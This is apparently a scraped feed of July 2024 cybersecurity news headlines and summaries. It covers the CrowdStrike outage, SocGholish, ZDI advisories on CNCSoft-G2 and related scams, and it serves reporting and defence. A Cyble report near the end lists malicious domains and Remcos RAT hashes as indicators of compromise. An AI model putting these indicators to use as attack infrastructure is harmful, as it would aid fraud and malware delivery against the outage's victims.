The JavaScript downloader malware known as SocGholish (aka FakeUpdates) is being used to deliver a remote access trojan called AsyncRAT as well as a legitimate open-source project called BOINC. BOINC, short for Berkeley Open Infrastructure Network Computing Client, is an open-source "volunteer computing" platform maintained by the University of California with an aim to carry out "large-scale

by The Hacker News

2024-07-22 12:08:00

India’s Largest Cryptocurrency Exchange WazirX Hacked: $234.9 Million Stolen

India’s largest cryptocurrency exchange WazirX launches bug bounty program “to help recover the stolen funds” as cybercriminals stole…

by Hackread

2024-07-22 12:00:00

Fallout From Faulty Friday CrowdStrike Update Persists

Historic IT outage expected to spur regulatory scrutiny, soul-searching over "monoculture" of IT infrastructure — and cyberattack threats.

by Dark Reading

2024-07-22 11:45:00

NCA cracks digitalstress DDoS-for-hire operation

by ComputerWeekly

2024-07-22 11:20:02

SocGholish malware used to spread AsyncRAT malware

The JavaScript downloader SocGholish (aka FakeUpdates) is being used to deliver the AsyncRAT and the legitimate open-source project BOINC. Huntress researchers observed the JavaScript downloader malware SocGholish (aka FakeUpdates) that is being used to deliver remote access trojan AsyncRAT and the legitimate open-source project BOINC (Berkeley Open Infrastructure Network Computing Client). The BOINC project is […]

by Security Affairs

2024-07-22 10:38:03

Is SWG Dead?

Secure Web Gateways (SWG) are one of the first true internet-based security technologies, and one of the most widely used. They have evolved over the years to counter the ever-escalating threats that lurk on the web, and if anything, are more relevant than ever.

by Forcepoint Blog

2024-07-22 10:30:00

The Pentagon Wants to Spend $141 Billion on a Doomsday Machine

The DOD wants to refurbish ICBM silos that give it the ability to end civilization. But these missiles are useless as weapons, and their other main purpose—attracting an enemy’s nuclear strikes—serves no end.

by WIRED Security News

2024-07-22 10:00:51

From RA Group to RA World: Evolution of a Ransomware Group

Ransomware gang RA World rebranded from RA Group. We discuss their updated tactics from leak site changes to an analysis of their operational tools. The post From RA Group to RA World: Evolution of a Ransomware Group appeared first on Unit 42.

by Palo Alto Networks - Unit42

2024-07-22 09:50:00

NCSC: Beware of criminal CrowdStrike opportunists

by ComputerWeekly

2024-07-22 09:26:00

New Linux Variant of Play Ransomware Targeting VMware ESXi Systems

Cybersecurity researchers have discovered a new Linux variant of a ransomware strain known as Play (aka Balloonfly and PlayCrypt) that's designed to target VMware ESXi environments. "This development suggests that the group could be broadening its attacks across the Linux platform, leading to an expanded victim pool and more successful ransom negotiations," Trend Micro researchers said in a

by The Hacker News

2024-07-22 09:01:00

CrowdStrike, Microsoft scramble to contain fallout from global IT outage

Cybersecurity and IT experts said users are having major difficulties in recovery efforts, despite workarounds and guidance the vendors released.

by Cybersecurity Dive

2024-07-22 09:00:02

Industry Moves for the week of July 22, 2024 - SecurityWeek

Explore industry moves and significant changes in the industry for the week of July 22, 2024. Stay updated with the latest industry trends and shifts.

by SecurityWeek

2024-07-22 09:00:00

Closing the Gender Pay Gap in IT: A Step Closer to Clinking Champagne Glasses

However, the participation gap between males and females in the IT industry is still significant, according to ITPro Today's 2024 IT Salary Survey Report.

by ITPro Today

2024-07-22 09:00:00

How To Do a Security Audit of Pimcore Enterprise Platform

Our new research paper gives you a roadmap for using Pimcore's features while preserving security.

Enterprises are using Pimcore, an open-source enterprise PHP solution, to streamline data management and experience management across devices. Our new research paper "Auditing Pimcore Enterprise Platform" examines the most common issues with Pimcore and details methods that can be used to find new vulnerabilities in the software.

Pimcore integrates various functionalities, including product information management (PIM), master data management (MDM), digital asset management (DAM), customer data platform (CDP), and digital experience management (DXP). Built on the PHP Symfony framework, Pimcore can be deployed on-premises or in the cloud as a platform-as-a-service (PaaS) component.

Our research paper provides an overview of the core functionalities and structure of Pimcore, highlighting how its modular design promotes code reusability and maintainability. It also delves into common misconfigurations and vulnerabilities, such as cross-site scripting (XSS) and SQL injection (SQLi), and offers practical recommendations on how to safeguard your Pimcore instance.

By reading this research, you will:

- Understand core functionalities: Gain insights into the architecture of Pimcore and how it leverages the Symfony framework to provide a scalable and flexible solution.
- Identify common vulnerabilities: Learn about the typical security issues found in Pimcore installations, including misconfigurations that can lead to significant security risks.
- Learn best practices: Get expert advice on maintaining security, performing regular vulnerability scans, and ensuring your Pimcore stack is always up-to-date.

Our paper also discusses the impact of enabling debug mode, the risks associated with exposed administration panels, and the importance of a stringent Content Security Policy (CSP). We provide detailed methodologies for identifying and mitigating the risks and ensuring that your use of Pimcore remains secure.

Whether you are a developer, security professional, or IT manager, this paper will equip you with the knowledge to optimize and protect your Pimcore deployments. Download the paper now to understand the full potential of Pimcore while maintaining your security posture.

by Tenable

2024-07-22 08:55:00

CrowdStrike’s unforced error puts its reputation on the line

The widespread release of defective code suggests CrowdStrike didn’t properly test its update before it was released or that process failed to catch the mistake, experts said.

by Cybersecurity Dive

2024-07-22 08:15:03

Scams at the Paris Olympics | Kaspersky official blog

What kind of scams await spectators of the 2024 Summer Olympics in Paris?

by Kaspersky

2024-07-22 07:14:48

A week in security (July 15 – July 21)

A list of topics we covered in the week of July 15 to July 21 of 2024

by Malwarebytes Labs

2024-07-22 07:08:42

UK police arrested a 17-year-old linked to the Scattered Spider gang

Law enforcement arrested a 17-year-old boy from Walsall, U.K., for suspected involvement in the Scattered Spider cybercrime syndicate. Law enforcement in the U.K. arrested a 17-year-old teenager from Walsall who is suspected to be a member of the Scattered Spider cybercrime group (also known as UNC3944, 0ktapus). The arrest is the result of a joint international law enforcement […]

by Security Affairs

2024-07-22 06:59:27

Threat Actors Use Telegram APIs for Harvesting Credentials

Executive Summary In recent weeks, there has been an increase in phishing attacks, conducted through messaging platforms like Telegram. Telegram is a widely used app that allows users to send messages, photos, videos, and

by Forcepoint Blog

2024-07-22 06:00:00

Under-Resourced Maintainers Pose Risk to Africa's Open Source Push

Many nations see open source software as a great equalizer, giving the Global South the tools necessary for sustainable development. But recent supply chain attacks highlight the need for security.

by Dark Reading

2024-07-22 04:00:00

CIA AI director Lakshmi Raman claims the agency is taking a ‘thoughtful approach’ to AI

As a part of TechCrunch’s ongoing Women in AI series, which seeks to give AI-focused women academics and others their well-deserved — and overdue — time in the spotlight, TechCrunch interviewed Lakshmi Raman, the director of AI at the CIA. We talked about her path to director as well as the CIA’s use of AI, and the […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

2024-07-22 00:00:00

ZDI-24-952: Delta Electronics CNCSoft-G2 DPAX File Parsing Memory Corruption Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39881.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-951: Delta Electronics CNCSoft-G2 DPAX File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39883.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-950: Delta Electronics CNCSoft-G2 DPAX File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39881.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-949: Delta Electronics CNCSoft-G2 DPAX File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39883.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-948: Delta Electronics CNCSoft-G2 DPAX File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39882.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-947: Delta Electronics CNCSoft-G2 DPAX File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39881.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-946: Delta Electronics CNCSoft-G2 DPAX File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39881.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-945: Delta Electronics CNCSoft-G2 DPAX File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39881.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-944: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-943: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-942: Delta Electronics CNCSoft-G2 DPAX File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39882.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-941: Delta Electronics CNCSoft-G2 DPAX File Parsing Memory Corruption Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39881.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-940: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-939: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-938: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-937: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-936: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-935: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-934: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-933: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-932: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-931: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-930: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-929: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-928: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-927: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-926: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-925: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-924: Delta Electronics CNCSoft-G2 ALM File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-923: Delta Electronics CNCSoft-G2 ALM File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-922: Delta Electronics CNCSoft-G2 CMT File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-921: Delta Electronics CNCSoft-G2 ALM File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-920: Delta Electronics CNCSoft-G2 ALM File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-919: Delta Electronics CNCSoft-G2 ALM File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-918: Delta Electronics CNCSoft-G2 ALM File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-917: Delta Electronics CNCSoft-G2 ALM File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-21 13:31:24

Security Affairs Malware Newsletter – Round 3

Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape: Hardening of HardBit; 10,000 Victims a Day: Infostealer Garden of Low-Hanging Fruit; This Meeting Should Have Been an Email; Ransomware Detection Model Based on Adaptive Graph Neural Network Learning; SEXi ransomware rebrands to APT INC, continues […]

by Security Affairs

2024-07-20 21:31:00

Cybercriminals Exploit CrowdStrike Update Mishap to Distribute Remcos RAT Malware

Cybersecurity firm CrowdStrike, which is facing the heat for causing worldwide IT disruptions by pushing out a flawed update to Windows devices, is now warning that threat actors are exploiting the situation to distribute Remcos RAT to its customers in Latin America under the guise of providing a hotfix. The attack chains involve distributing a ZIP archive file named "crowdstrike-hotfix.zip,"

by The Hacker News

2024-07-20 18:00:00

Unpacking how Alphabet’s rumored Wiz acquisition could affect VC

Alphabet, the parent company of Google, is in advanced talks to acquire cybersecurity startup Wiz for $23 billion, the Wall Street Journal reported on Sunday. TechCrunch’s sources heard similar and added that deal discussions could last into next week. If this deal does end up getting done, it would be Alphabet’s largest acquisition yet. It […]

by TechCrunch

2024-07-20 17:32:44

🍯 Bee-side 180 - How to be Invisible Online

Silently Install Chrome Extension For Persistence, Google's open-source Emoji font, DDoSing ruins Domain Reputation, and more...

by Hive Five

2024-07-20 17:01:19

Microsoft says 8.5M Windows devices were affected by CrowdStrike outage

Around 8.5 million devices — less than 1 percent of Windows machines globally — were affected by the recent CrowdStrike outage, according to a Microsoft blog post by David Weston, the company’s vice president of enterprise and OS security. These are the first real numbers released by either Microsoft or CrowdStrike around the scale of […]

by TechCrunch

2024-07-20 16:42:40

Threat Actors Exploit Recent CrowdStrike Outage to Ramp Up Suspicious Domain Creation

On July 19th, 2024, CrowdStrike, a leading cybersecurity provider of advanced endpoint security detection and protection solutions, released a sensor configuration update to Windows systems. This update contained a logic error that resulted in system crashes and Blue Screen of Death (BSOD) incidents. The faulty software update caused widespread disruptions on Friday, affecting critical services in banks, airlines, hospitals, stock markets, and IT industries globally.

On July 20th, 2024, CrowdStrike released technical details explaining that a logic error in a channel file caused the BSOD. This buggy channel file was designed to detect newly observed malicious named pipes for identifying standard C2 (Command and Control) frameworks in cyberattacks. CrowdStrike also mentioned conducting a thorough root cause analysis to understand how this logic error occurred.

While the entire world is grappling with the outbreak and working to resolve the issues, Threat Actors (TAs) are exploiting this situation to their advantage. Within 24 hours of the incident, TAs created several malicious domains to target individuals and organizations interested in closely following this incident. The cybersecurity community quickly identified these malicious domains and shared the information via platforms like X (formerly Twitter), LinkedIn, etc.

SANS shared a post on X about a domain named "crowdstrikeclaim.com," offering a form for impacted organizations to request a free claim review. The form asks for detailed information, including phone number, first name, last name, and email address. Submitting this personal and organizational data could result in identity theft or unauthorized access to accounts.

Well-known security researcher John Hammond shared a post on X about a domain called "crowdstrikebluescreen.com," which offers services to affected organizations. Verifying such services is crucial, as engaging with misleading or fraudulent offers could lead to additional operational problems and divert resources and attention away from addressing the original incident.

Bernardo Quintero, founder of VirusTotal, shared a post on X about TAs exploiting the CrowdStrike incident by distributing malware disguised as a hotfix. The file name suggests that the TAs have created .zip domains to distribute the malware.

Conclusion: The emergence of malicious domains and fraudulent services illustrates the need for heightened caution and verification when dealing with offers and requests related to security incidents. These threats pose risks of identity theft and unauthorized access and can divert valuable resources and attention from resolving the core problem. Furthermore, the distribution of malware disguised as a hotfix demonstrates the adaptability and persistence of TAs in exploiting current events for their gain. In navigating these challenges, it is essential for organizations to remain alert, verify the legitimacy of any claims or services, and maintain robust security practices to safeguard against such threats.

Our Recommendations:

- Avoid submitting personal or organizational information on sites offering "free claim reviews" or other services related to the incident. These may be scams designed to steal sensitive information.
- Before engaging with any service or offer related to the incident, verify the provider's legitimacy.
- Only follow remediation steps and instructions from CrowdStrike's official support channels.
- Use updated antivirus and anti-malware tools to scan for and block malicious files or domains.
- Stay informed about the latest threats and security measures to protect your systems.
- Educate employees and stakeholders about recognizing and avoiding scams and phishing attempts.

Indicators of Compromise (IOCs)

Indicator | Indicator Type | Description
crowdstrikeupdate.com | Domain | Malicious domain
crowdstrikefix.zip | Domain | Malicious domain
crowdstrikereport.com | Domain | Malicious domain
crowdstrike-helpdesk.com | Domain | Malicious domain
microsoftcrowdstrike.com | Domain | Malicious domain
crowdstrikeoutage.info | Domain | Malicious domain
crowdstrikebsod.com | Domain | Malicious domain
crowdfalcon-immed-update.com | Domain | Malicious domain
whatiscrowdstrike.com | Domain | Malicious domain
fix-crowdstrike-bsod.com | Domain | Malicious domain
fix-crowdstrike-apocalypse.com | Domain | Malicious domain
crowdstuck.org | Domain | Malicious domain
crowdstriketoken.com | Domain | Malicious domain
crowdstrikefix.com | Domain | Malicious domain
crowdstrikedoomsday.com | Domain | Malicious domain
crowdstrikebluescreen.com | Domain | Malicious domain
crowdstrike0day.com | Domain | Malicious domain
crowdstrike-bsod.com | Domain | Malicious domain
crowdstrike-hotfix.zip | Domain | Malicious domain
crowdstrikeclaim.com | Domain | Malicious domain
1e84736efce206dc973acbc16540d3e5 | MD5 | crowdstrike-hotfix.zip (Remcos RAT)
fef212ec979f2fe2f48641160aadeb86b83f7b35 | SHA1 | crowdstrike-hotfix.zip (Remcos RAT)
c44506fe6e1ede5a104008755abf5b6ace51f1a84ad656a2dccc7f2c39c0eca2 | SHA256 | crowdstrike-hotfix.zip (Remcos RAT)

by CYBLE

2024-07-20 10:30:00

The Feds Say These Are the Russian Hackers Who Attacked US Water Utilities

Plus: The FBI unlocks the Trump shooter’s phone, a security researcher gets legal threats for exposing hackable traffic lights, and more.

by WIRED Security News

2024-07-20 09:58:00

17-Year-Old Linked to Scattered Spider Cybercrime Syndicate Arrested in U.K.

Law enforcement officials in the U.K. have arrested a 17-year-old boy from Walsall who is suspected to be a member of the notorious Scattered Spider cybercrime syndicate. The arrest was made "in connection with a global cyber online crime group which has been targeting large organizations with ransomware and gaining access to computer networks," West Midlands police said. "The arrest is part of

by The Hacker News

2024-07-20 00:01:02

Faulty CrowdStrike update causes major global IT outage, taking out banks, airlines and businesses globally

Security giant CrowdStrike said the outage was not caused by a cyberattack, as businesses anticipate widespread disruption. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

2024-07-19 23:55:02

US cyber agency CISA says malicious hackers are ‘taking advantage’ of CrowdStrike outage

CISA confirmed the CrowdStrike outage was not caused by a cyberattack, but urged caution as malicious hackers exploit the situation. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

2024-07-19 22:37:17

CrowdStrike outage: How your plane, train and automobile travel may be affected

The CrowdStrike outage that hit early Friday morning and knocked out computers running Microsoft Windows has grounded flights globally. Major U.S. airlines including United Airlines, American Airlines and Delta Air Lines have halted flight operations around the world. According to FlightAware, which is tracking the cancellations live, 7% of United Airlines flights, 8% of American […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

2024-07-19 22:19:42

Don’t Fall for CrowdStrike Outage Scams

Swindlers are spinning up bogus websites in an attempt to dupe people with “CrowdStrike support” scams following the security firm's catastrophic software update.

by WIRED Security News

2024-07-19 21:48:25

Sustainability, community engagement, and philanthropy at the Barracuda Championship

With the Barracuda Championship in full swing, we're pleased to highlight some of the current and past CSR initiatives that we've been actively engaged in throughout the years.

by Barracuda

2024-07-19 20:29:47

CrowdStrike Global IT Outage: Time to Reflect on the Process for Security Vendor Updates?

Read The NetSPI Agent’s take on the impact and exploitability of the regreSSHion OpenSSH vulnerability that could lead to unauthenticated RCE. The post CrowdStrike Global IT Outage: Time to Reflect on the Process for Security Vendor Updates?  appeared first on NetSPI.

by NetSPI

2024-07-19 19:59:42

CrowdStrike Phishing Attacks Appear in Record Time

I have been the CEO of an anti-virus software developer. We had a special acronym for catastrophic events like this, a so-called "CEE". As in Company Extinction Event.

But first: Our systems and network were not affected and we have no impact from this.

